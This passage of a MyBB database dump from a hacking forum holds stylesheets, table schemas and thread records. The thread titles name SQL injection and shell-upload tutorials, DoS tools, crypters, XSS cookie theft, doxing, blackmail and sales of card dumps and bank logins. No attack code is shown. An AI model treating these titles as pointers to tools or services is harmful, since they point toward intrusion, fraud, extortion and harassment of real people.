position: relative;\n width:80px;\n height:16px;\n overflow: hidden;\n list-style: none;\n margin: 0;\n padding: 0;\n background-position: left top;\n}\n\ntd .star_rating {\n margin: auto;\n}\n\n.star_rating li {\n display: inline;\n}\n\n.star_rating li a,\n.star_rating .current_rating {\n position: absolute;\n text-indent: -1000px;\n height: 16px;\n line-height: 16px;\n outline: none;\n overflow: hidden;\n border: none;\n top:0;\n left:0;\n}\n\n.star_rating_notrated li a:hover {\n background-position: left bottom;\n}\n\n.star_rating li a.one_star {\n width:20%;\n z-index:6;\n}\n\n.star_rating li a.two_stars {\n width:40%;\n z-index:5;\n}\n\n.star_rating li a.three_stars {\n width:60%;\n z-index:4;\n}\n\n.star_rating li a.four_stars {\n width:80%;\n z-index:3;\n}\n\n.star_rating li a.five_stars {\n width:100%;\n z-index:2;\n}\n\n.star_rating .current_rating {\n z-index:1;\n background-position: left center;\n}\n\n.star_rating_success, .success_message {\n color: #00b200;\n font-weight: bold;\n font-size: 10px;\n margin-bottom: 10px;\n}\n\n.inline_rating {\n background: url(images/CoderGreen/star_rating.gif) left -1000px repeat-x;\n width: 210px;\n vertical-align: middle;\n}\n\n\n ', 'star_ratings.css', '1343925064'); INSERT INTO mybb_themestylesheets VALUES('34', 'showthread.css', '10', 'showthread.php', '\nul.thread_tools, ul.thread_tools li {\n list-style: none;\n padding: 0;\n margin: 0;\n}\n\nul.thread_tools li {\n padding-left: 26px;\n padding-bottom: 4px;\n margin-bottom: 3px;\n font-size: 11px;\n}\n\nul.thread_tools li.printable {\n background: url(images/CoderGreen/printable.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.sendthread {\n background: url(images/CoderGreen/send.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.subscription_add {\n background: url(images/CoderGreen/subscribe.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.subscription_remove {\n background: url(images/CoderGreen/unsubscribe.gif) no-repeat 0px 0px;\n}\n\n\n ', 'showthread.css', '1343925064'); INSERT INTO mybb_themestylesheets VALUES('35', 'tabbed.css', '10', 'index.php', '\n.shadetabs {\npadding: 3px 0;\nmargin-left: 0;\nmargin-top: 1px;\nmargin-bottom: 0;\nfont: bold 12px Verdana;\nlist-style-type: none;\ntext-align: left; /*set to left, center, or right to align the menu as desired*/\n}\n\n.shadetabs li {\ndisplay: inline;\nmargin: 0;\n}\n\n.shadetabs li a {\n background: #298A08 url(images/CoderGreen/tabs.png) top left repeat-x;;\n color: #ffffff;\n -webkit-border-top-left-radius: 5px;\n -webkit-border-top-right-radius: 5px;\n -moz-border-radius-topleft: 5px;\n -moz-border-radius-topright: 5px;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n position: relative;\n z-index: 1;\n padding: 3px 7px;\n margin-right: 3px;\n border: 1px solid #778;\n \n text-decoration: none;\n}\n\n.shadetabs li a:hover {\ntext-decoration: underline;\n}\n\n.shadetabs li a.selected {\n /*selected main tab style */\nposition: relative;\ntop: 1px;\n}\n\n.shadetabs li a.selected {\n background: #298A08 url(images/CoderGreen/tabs.png) top left repeat-x;;\n color: #ffffff;\n -webkit-border-top-left-radius: 5px;\n -webkit-border-top-right-radius: 5px;\n -moz-border-radius-topleft: 5px;\n -moz-border-radius-topright: 5px;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-bottom-color: #81A2C4;\n}\n\n.shadetabs li a.selected:hover {\n /*selected main tab style */\ntext-decoration: none;\n}\n\n.tabcontent {\ndisplay:none;\n}\n\n@\nmedia print {\n.tabcontent {\ndisplay:block !important;\n}\n\n\n}\n\n', 'tabbed.css', '1344967962'); DROP TABLE IF EXISTS mybb_threadprefixes; CREATE TABLE mybb_threadprefixes ( pid int(10) unsigned NOT NULL auto_increment, prefix varchar(120) NOT NULL, displaystyle varchar(200) NOT NULL, forums text NOT NULL, groups text NOT NULL, PRIMARY KEY (pid) ); DROP TABLE IF EXISTS mybb_threadratings; CREATE TABLE mybb_threadratings ( rid int(10) unsigned NOT NULL auto_increment, tid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, rating smallint(5) unsigned NOT NULL, ipaddress varchar(30) NOT NULL, PRIMARY KEY (rid), KEY tid (tid,uid) ); DROP TABLE IF EXISTS mybb_threads; CREATE TABLE mybb_threads ( tid int(10) unsigned NOT NULL auto_increment, fid smallint(5) unsigned NOT NULL, subject varchar(120) NOT NULL, prefix smallint(5) unsigned NOT NULL, icon smallint(5) unsigned NOT NULL, poll int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, username varchar(80) NOT NULL, dateline bigint(30) NOT NULL, firstpost int(10) unsigned NOT NULL, lastpost bigint(30) NOT NULL, lastposter varchar(120) NOT NULL, lastposteruid int(10) unsigned NOT NULL, views int(100) NOT NULL, replies int(100) NOT NULL, closed varchar(30) NOT NULL, sticky int(1) NOT NULL, numratings smallint(5) unsigned NOT NULL, totalratings smallint(5) unsigned NOT NULL, notes text NOT NULL, visible int(1) NOT NULL, unapprovedposts int(10) unsigned NOT NULL, attachmentcount int(10) unsigned NOT NULL, deletetime int(10) unsigned NOT NULL, PRIMARY KEY (tid), KEY fid (fid,visible,sticky), KEY dateline (dateline), KEY lastpost (lastpost,fid), KEY firstpost (firstpost), KEY uid (uid), KEY subject (subject) ); INSERT INTO mybb_threads VALUES('1', '2', 'tggfg', '0', '0', '0', '1', 't3h jok3r', '1339740375', '1', '1339998836', 't3h jok3r', '1', '40', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('2', '34', 'Userbar tut', '0', '0', '0', '2', 'Apathy', '1339911671', '4', '1350875414', 'Exposé', '222', '145', '13', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('3', '19', '[Junk]Official Site Rules', '0', '0', '0', '3', '??????????¢™', '1339989731', '7', '1350169128', 't3h jok3r', '1', '87', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('4', '12', 'How to stay anonymous and how to protect your info over the internet (basics)', '0', '0', '0', '2', 'Apathy', '1339990220', '8', '1342390102', 't3h jok3r', '1', '44', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('6', '4', 'Welcome to L33THacking.com', '0', '0', '0', '1', 't3h jok3r', '1339994562', '14', '1344966038', 't3h jok3r', '1', '41', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('5', '16', 'How to spot a liar', '0', '0', '0', '2', 'Apathy', '1339991477', '12', '1340077866', 'Triple H', '4', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('9', '19', 'tggfg', '0', '0', '0', '2', 'Apathy', '1339907807', '3', '1339907807', 'Apathy', '2', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('8', '19', '[Junk]test for j', '0', '0', '0', '1', 't3h jok3r', '1339998552', '18', '1339998582', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('10', '5', '[tut]How to moderate L33THacking', '0', '0', '0', '1', 't3h jok3r', '1340001648', '21', '1344027571', 'Hil', '27', '43', '6', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('15', '9', 'Adf.ly>Earn $$$ by clicks on links', '0', '0', '0', '4', 'Triple H', '1340078109', '41', '1340833510', 'Triple H', '4', '26', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('11', '15', '.EXE Booter Pack', '0', '0', '0', '3', '??????????¢™', '1340055626', '28', '1346503511', 'Jacob', '160', '38', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('12', '35', 'L33THacking userbar competition between t3h jok3r and apathy', '0', '0', '0', '1', 't3h jok3r', '1340066415', '32', '1340142283', '??????????¢™', '3', '40', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('13', '4', 'newbie', '0', '0', '0', '4', 'Triple H', '1340077670', '38', '1340317240', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('14', '8', 'Work Hard Play Hard-Rap', '0', '0', '0', '4', 'Triple H', '1340077789', '39', '1345143271', 'p420', '9', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('16', '11', 'Is Hacking legal or illegal?', '0', '0', '0', '4', 'Triple H', '1340078190', '42', '1345938106', 'duhuh', '90', '21', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('19', '16', '[tut]How to SE your school teachers', '0', '0', '0', '4', 'Triple H', '1340515684', '54', '1352521492', 'Timmy', '5', '36', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('17', '8', 'My Dubstep Remixs', '0', '0', '0', '3', '??????????¢™', '1340081822', '46', '1349026715', '??????????¢™', '3', '36', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('26', '17', '[tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '0', '0', '1', 't3h jok3r', '1341181178', '79', '1345937077', 't3h jok3r', '1', '44', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('18', '2', 'star test', '0', '0', '0', '1', 't3h jok3r', '1340143700', '49', '1347647046', 't3h jok3r', '1', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('20', '13', 'SQL Injection Tutorial (Step-by-Step)', '0', '0', '0', '5', 'Timmy', '1340517446', '57', '1340593391', 't3h jok3r', '1', '31', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('21', '16', '[GUIDE] In-depth reading of body language.', '0', '0', '0', '2', 'Apathy', '1340568256', '59', '1340833672', 'Triple H', '4', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('22', '14', 'Cyberghost VPN (Free/Premium)', '0', '0', '0', '1', 't3h jok3r', '1340594542', '62', '1347493698', 'iTzIpod', '82', '28', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('23', '11', 'Can someone tell me what\'s the difference between a proxy and VPN?', '0', '0', '0', '5', 'Timmy', '1340595366', '66', '1340833246', 'Timmy', '5', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('24', '12', '240 Monetizing and hacking ebooks.', '0', '0', '0', '2', 'Apathy', '1340764927', '69', '1345868955', 'iTzIpod', '82', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('25', '19', '[Junk]Blackhat System Scanner', '0', '0', '0', '5', 'Timmy', '1340833180', '71', '1346798045', 't3h jok3r', '1', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('27', '13', '[TuT] Upload Shell Through SQL Injection', '0', '0', '0', '5', 'Timmy', '1341182787', '80', '1341182787', 'Timmy', '5', '19', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('28', '3', 'Buttons updated.', '0', '0', '0', '1', 't3h jok3r', '1341434168', '82', '1344287989', 'khade009', '17', '17', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('29', '15', '???Italian DoS tool (Great for hitting sites offline)???', '0', '0', '0', '1', 't3h jok3r', '1341434810', '83', '1346259799', 'HoverCatz', '67', '68', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('30', '12', 'HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '0', '0', '4', 'Triple H', '1341435898', '84', '1350940383', 'NXK', '61', '32', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('31', '7', 'How long are you online daily?', '0', '0', '0', '4', 'Triple H', '1341436045', '86', '1345817656', 'iTzIpod', '82', '24', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('32', '16', '[tut]How to SE Amazon Kindles', '0', '0', '0', '5', 'Timmy', '1341437012', '87', '1345937646', 'Timmy', '5', '40', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('33', '20', 'Heavens Crypter FUD', '0', '0', '0', '5', 'Timmy', '1341437435', '88', '1344547811', 't3h jok3r', '1', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('34', '3', 'L33THACKING.com is Back', '0', '0', '0', '1', 't3h jok3r', '1342041316', '93', '1342041316', 't3h jok3r', '1', '14', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('35', '4', 'Reminiscing ?\'s Landed', '0', '0', '0', '11', 'Reminiscing ?', '1342041433', '94', '1342102341', 't3h jok3r', '1', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('36', '2', 'Attachments', '0', '0', '0', '1', 't3h jok3r', '1342105715', '96', '1342105715', 't3h jok3r', '1', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('37', '5', 'Updates for 7/12/12', '0', '0', '0', '1', 't3h jok3r', '1342107856', '97', '1342107856', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('38', '16', '[tut] How to lie like a pro', '0', '0', '0', '1', 't3h jok3r', '1342112159', '98', '1347765694', 'iTzIpod', '82', '42', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('39', '17', 'E-Whoring Pics Pack of 11 girls', '0', '0', '0', '1', 't3h jok3r', '1342112687', '99', '1345751702', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('40', '17', '600 pic ewhore pack', '0', '0', '0', '1', 't3h jok3r', '1342112738', '100', '1345936890', 't3h jok3r', '1', '22', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('41', '15', 'Virus O Matic.. Virus Creator', '0', '0', '0', '4', 'Triple H', '1342113990', '103', '1345908751', 'BurnsH4X', '48', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('42', '12', '[tut]Hacking 4shared accounts access premium user files', '0', '0', '0', '4', 'Triple H', '1342114102', '104', '1342393326', 'Apathy', '2', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('43', '7', 'How did you find us?', '0', '0', '0', '1', 't3h jok3r', '1342114322', '105', '1350551223', 'R?????zo?', '62', '133', '29', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('44', '8', 'Don\'t Wake Me Up', '0', '0', '0', '13', 'unixmoon', '1342146175', '107', '1342191756', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('45', '49', 'Varied Sections', '0', '0', '0', '11', 'Reminiscing ?', '1342191908', '111', '1342266617', 't3h jok3r', '1', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('46', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '0', '0', '6', 'xlesnyx12', '1342262132', '118', '1342265729', 't3h jok3r', '1', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('47', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '0', '0', '6', 'xlesnyx12', '1342262231', '119', '1342266080', 't3h jok3r', '1', '4', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('48', '21', '[Strong] Anonymous DoSer _z0r0_in C #', '0', '0', '0', '8', 'spacefish36', '1342303751', '125', '1352221355', 'Jacob', '160', '67', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('49', '21', 'Pandora DDOS Bot [Direct Link]', '0', '0', '0', '8', 'spacefish36', '1342304133', '126', '1345180204', 'NXK', '61', '40', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('50', '12', '[tut]How to DOX', '0', '0', '0', '1', 't3h jok3r', '1342395175', '132', '1350558532', 'VirtualLegend', '228', '59', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('51', '11', 'DON\'T USE GOOGLE!!!', '0', '0', '0', '1', 't3h jok3r', '1342395331', '133', '1350119804', 'XxTREYZxX', '257', '75', '12', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('52', '9', '?? Adsense Secrets - What Google Never Told ?? [New Release] [Huge Profits]', '0', '0', '0', '4', 'Triple H', '1342395879', '134', '1344964677', 'spacefish36', '8', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('53', '19', '[Junk]Adding Beauty by Painting', '0', '0', '0', '18', 'MartyFogerlie', '1342429044', '136', '1342468645', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('54', '16', '[tut]How to SE McDonald', '0', '0', '0', '9', 'p420', '1342469413', '138', '1346814659', '??????Z', '112', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('55', '12', '[tut] SMS Bomber', '0', '0', '0', '9', 'p420', '1342469677', '139', '1344197810', 'p420', '9', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('56', '15', 'Tubeonia [ Best Youtube Bot ]', '0', '0', '0', '5', 'Timmy', '1342470071', '140', '1347742784', 'iTzIpod', '82', '23', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('57', '18', 'Hackyer\'s Email Bomber V1.0', '0', '0', '0', '12', 'jonas83', '1342471305', '141', '1345681211', 'Romdu62', '7', '34', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('58', '42', 'Miley Cyrus gets swatted', '0', '0', '0', '1', 't3h jok3r', '1343945931', '144', '1343945931', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('59', '42', '13 year old visits jail for hacking', '0', '0', '0', '1', 't3h jok3r', '1343946002', '145', '1345641562', 't3h jok3r', '1', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('60', '25', '[guide] Basic Computer Security', '0', '0', '0', '1', 't3h jok3r', '1343946768', '146', '1345141325', 'sirchamp', '53', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('61', '23', '[Tutorial] Prevention of Infection', '0', '0', '0', '8', 'spacefish36', '1343947441', '147', '1343948116', 'Timmy', '5', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('62', '25', '[Guide]Firewalls', '0', '0', '0', '8', 'spacefish36', '1343947517', '148', '1344199034', 't3h jok3r', '1', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('63', '23', '[Guide] - Keylogger Information & Removal - [Guide]', '0', '0', '0', '12', 'jonas83', '1343948019', '149', '1349501175', 'mothered', '205', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('64', '23', 'Securing your website', '0', '0', '0', '5', 'Timmy', '1343948298', '151', '1347684399', 'Romdu62', '7', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('65', '41', 'Auction Thread Guidelines', '0', '0', '0', '1', 't3h jok3r', '1343951507', '156', '1345506120', 'p420', '9', '9', '1', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('66', '63', 'Read this thread before you make a Request!', '0', '0', '0', '4', 'Triple H', '1343951621', '157', '1347227235', 'iTzIpod', '82', '28', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('67', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987223', '160', '1344003201', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('68', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987480', '161', '1344003305', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('69', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987819', '162', '1344003241', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('70', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987972', '163', '1344003257', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('74', '12', '? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '0', '0', '5', 'Timmy', '1344114849', '175', '1345864578', 'KFallen', '101', '63', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('73', '12', '|TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '0', '0', '1', 't3h jok3r', '1344114388', '174', '1344955695', 'sana khan', '50', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('75', '13', '~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '0', '0', '8', 'spacefish36', '1344198200', '181', '1351613885', 'CommandoModz', '306', '38', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('76', '14', 'Hide-IP-Browser', '0', '0', '0', '12', 'jonas83', '1344198709', '183', '1344198709', 'jonas83', '12', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('77', '16', 'Disguise your voice over Skype', '0', '0', '0', '12', 'jonas83', '1344198838', '184', '1349490083', 'Exposé', '222', '22', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('78', '7', 'Dota 2 beta keys giveawat!', '0', '0', '0', '27', 'Hil', '1344282662', '187', '1345852758', 'NXK', '61', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('79', '29', '[tut]How to ruin somones life[DOX]', '0', '0', '0', '1', 't3h jok3r', '1344287048', '189', '1351979798', 'XxTREYZxX', '257', '55', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('80', '24', 'How WiFi Security Works', '0', '0', '0', '1', 't3h jok3r', '1344287527', '190', '1350132790', 'XxTREYZxX', '257', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('81', '12', '[tut]How to spread your server', '0', '0', '0', '4', 'Triple H', '1344287709', '191', '1345750602', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('82', '13', '[guide]How to detect Hash Type', '0', '0', '0', '17', 'khade009', '1344287942', '193', '1344456396', 'Romdu62', '7', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('83', '34', '[tut]How to make a thread design', '0', '0', '0', '9', 'p420', '1344288236', '196', '1345557952', 'iTzIpod', '82', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('84', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344312979', '199', '1344356245', 'JakeUS', '20', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('85', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313194', '200', '1344356262', 'JakeUS', '20', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('86', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313620', '201', '1344356274', 'JakeUS', '20', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('87', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313725', '202', '1344356288', 'JakeUS', '20', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('88', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313895', '203', '1344356299', 'JakeUS', '20', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('89', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313990', '204', '1344356309', 'JakeUS', '20', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('90', '24', '[tut]How to really hide your data from the cops', '0', '0', '0', '1', 't3h jok3r', '1344372996', '215', '1345065077', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('91', '42', 'Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '0', '0', '1', 't3h jok3r', '1344452361', '219', '1345555125', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('92', '15', '[FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '0', '0', '9', 'p420', '1344454979', '220', '1347742927', 'iTzIpod', '82', '38', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('93', '18', 'Gmail Brute Forcer Tool', '0', '0', '0', '9', 'p420', '1344455840', '221', '1344898404', 'Triple H', '4', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('94', '16', 'What is this section about?', '0', '0', '0', '9', 'p420', '1344456185', '223', '1346503673', 'Jacob', '160', '36', '5', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('95', '13', 'XSS Cheat Sheet', '0', '0', '0', '7', 'Romdu62', '1344456827', '225', '1347493741', 'iTzIpod', '82', '21', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('96', '30', 'FBI Tools [11 in 1]', '0', '0', '0', '1', 't3h jok3r', '1344546455', '229', '1347981764', 'sirchamp', '53', '41', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('97', '12', 'How to XSS and steal Cookies', '0', '0', '0', '1', 't3h jok3r', '1344546730', '231', '1344546730', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('98', '20', 'FREE UD RazorCrypter (Cracked)', '0', '0', '0', '1', 't3h jok3r', '1344547965', '233', '1349731250', 'NeonLights', '203', '42', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('99', '3', '[Previews added]New theme for LH', '0', '0', '0', '1', 't3h jok3r', '1344895893', '237', '1345415977', 't3h jok3r', '1', '68', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('100', '18', '[tut]Hack any facebook or account that use username ID and forum password', '0', '0', '0', '4', 'Triple H', '1344898582', '240', '1349672458', 'Romdu62', '7', '46', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('101', '34', '[tut]Glossy Logo', '0', '0', '0', '4', 'Triple H', '1344898868', '241', '1350130813', 'XxTREYZxX', '257', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('103', '12', '[Tutorial] Stealing Cookies With XSS', '0', '0', '0', '51', 'SAPBasisWorld', '1344957203', '249', '1345143986', 'p420', '9', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('104', '33', 'Photoshop vs Gimp', '0', '0', '0', '13', 'unixmoon', '1344964293', '251', '1345937474', 'Timmy', '5', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('105', '11', 'DDos', '0', '3', '0', '48', 'BurnsH4X', '1344965203', '256', '1345072575', 't3h jok3r', '1', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('106', '38', 'Filling a scam report', '0', '0', '0', '1', 't3h jok3r', '1344965610', '257', '1344965610', 't3h jok3r', '1', '7', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO 